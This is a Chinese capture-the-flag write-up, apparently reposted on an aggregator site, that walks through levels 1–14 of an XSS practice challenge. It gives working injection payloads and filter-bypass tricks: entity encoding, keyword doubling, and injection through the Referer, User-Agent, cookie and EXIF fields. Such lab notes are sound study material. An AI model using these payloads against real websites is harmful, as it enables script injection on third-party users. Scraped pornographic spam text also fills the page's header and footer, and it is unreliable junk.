日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

XSS挑战之旅 解题记录

發(fā)布時(shí)間:2023/12/14 编程问答 42 豆豆
生活随笔 收集整理的這篇文章主要介紹了 XSS挑战之旅 解题记录 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

本文記錄xss挑戰(zhàn)解題,檢驗(yàn)自己的xss技術(shù)
題目鏈接
Level1
鏈接為http://test.xss.tv/level1.php?name=test
頁面沒有輸入點(diǎn)
直接構(gòu)造payloadname=<script>alert(1)</script>

Level2
一樣簡單,給出payload"><script>alert(1)</script>

Level3
過濾了尖括號
故用`’ οnclick=alert(1)//

Level4
和L3一樣,不同的是這里用雙引號閉合
" onclick=alert(1)//

Level5
用上面的進(jìn)行嘗試,發(fā)現(xiàn)將onclick變成o_nclick
這里改用添加鏈接方式
"><a href="javascript:alert(1)">
然后點(diǎn)擊鏈接即可

Level6
這里也將href過濾成hr_ef
這里用大小寫繞過過濾
"><a hrEf="javascript:alert(1)">

Level7
這里直接將href script刪除
于是采用機(jī)智方法
"><a hrhrefef="javascrscriptipt:alert(1)">

Level8
這里可以添加鏈接到頁面
于是直接javascript:alert(1)
但是不行因?yàn)闀cript過濾成scr_ipt
這里采用HTML字符實(shí)體轉(zhuǎn)換
將script轉(zhuǎn)化成&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;
最后payload java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)

Level9
使用上關(guān)的payload,被提示不合法,說明對鏈接進(jìn)行了格式要求
這里嘗試了很多次,最后看到網(wǎng)上的解答,吐血
因?yàn)檫@里只需要有http://即可
java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(&#x22;http://")
值得一提的是雙引號會被過濾,于是第一個(gè)雙引號用實(shí)體轉(zhuǎn)換機(jī)即可

Level10
看源碼,發(fā)現(xiàn)有幾個(gè)type=hidden的輸入框
于是使其顯示并可以onclick觸發(fā)事件
http://test.xss.tv/level10.php?t_sort=4" onclick=alert(1) type="text"

Level11
看源碼,有個(gè)是顯示referer
<input name="t_ref" value="http://test.xss.tv/level10.php?t_sort=4%22%20onclick=alert(1)%20type=%22text%22" type="hidden">
這里也是嘗試很多次,但是始終無法使得輸入框改變type
最后百度得出要抓包改referer即可
修改referer=12356" onclick=alert(1) type=text

Level12
和上一關(guān)類似,這次修改user-agent
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" onclick=alert(1) type="text"

Level13
看網(wǎng)頁源碼有個(gè)輸入框叫cook,故去看看cookie
果然有個(gè)cookie值為call me maybe
修改cookiecall me maybe?" onclick=alert(1) type="text"

Level14
這里也是沒思緒
百度得出答案,這里用的是烏云爆出的exif viewer的漏洞
修改圖片exif信息如標(biāo)題、作者' "><img src=1 onerror=alert(document.domain)>即可
之后第15關(guān)的鏈接失效了,就沒做下去了

總結(jié)

以上是生活随笔為你收集整理的XSS挑战之旅 解题记录的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 日本三级在线 | 中文字幕乱码中文乱码777 | 亚洲蜜臀av一区二区三区 | 在线视频日韩精品 | 成人午夜免费电影 | a视频在线观看免费 | 中文字幕25页 | 欧美日在线 | 69色| 在线观看中文字幕视频 | 老熟女一区二区三区 | 国内视频自拍 | 五月婷婷综合激情网 | 色www亚洲国产张柏芝 | 久久影院午夜 | 小视频在线免费观看 | 污污软件在线观看 | 97香蕉久久超级碰碰高清版 | 激情五月视频 | 一本色道综合久久欧美日韩精品 | 久久久7777| 毛片大全在线观看 | 亚洲精品一区二区三区中文字幕 | 伊人久久久久久久久久久 | 国产精品羞羞答答在线 | 欧美日韩精品在线视频 | 美女网站在线免费观看 | 性生活视频在线播放 | 国产乱码精品一品二品 | 一极黄色大片 | 黑人av | 国产青青青 | 亚洲午夜久久久久久久久久久 | 中文字幕视频观看 | 蜜桃精品在线 | 亚洲国语 | 欧美日韩一区视频 | 国产一级片网站 | www色亚洲 | 成人午夜精品视频 | 日日夜夜国产精品 | av毛片网站 | 日韩无码精品一区二区 | 中文免费av| 中文视频一区二区 | 欧洲国产精品 | 亚洲第九页 | 国产sm调教一区二区 | 欧美一区三区 | 国产精品久久久久久福利 | 麻豆视频免费在线观看 | 成人涩涩| 欧美女人交配视频 | 日韩激情一区二区三区 | 欧美精品人妻一区二区 | 亚洲一区动漫 | 欧美第一网站 | 日韩av电影一区 | 伊人成人22 | 无码精品人妻一区二区三区影院 | 国产永久免费观看 | 瑟瑟视频免费看 | 国产69xx| 3级av | 国产免费无遮挡 | 国产一区二区不卡视频 | 成年人的毛片 | 国产精品午夜在线观看 | 一级做a爱 | 日美一级片 | 日韩簧片在线观看 | 在线观看h视频 | 日本高清免费aaaaa大片视频 | 国产视频网站在线观看 | 欧美在线免费观看视频 | 欧美一级无毛 | 正在播放经典国语对白 | 日韩成人在线观看 | 怡红院综合网 | 天天视频天天爽 | 免费成人看片 | 久久精品午夜 | 快播视频在线观看 | 激情草逼 | 亚洲女人的天堂 | 99久久人妻精品免费二区 | 亚洲一区二区三区四区电影 | 亚洲av片不卡无码久久 | 少妇中出视频 | 免费视频精品 | 欧美天堂在线视频 | 91在线免费播放 | a v视频在线播放 | 日本高清免费视频 | 最新一区二区三区 | 成人免费一级 | 在线精品免费视频 | 一区二区三区精 | 日韩 欧美 自拍 |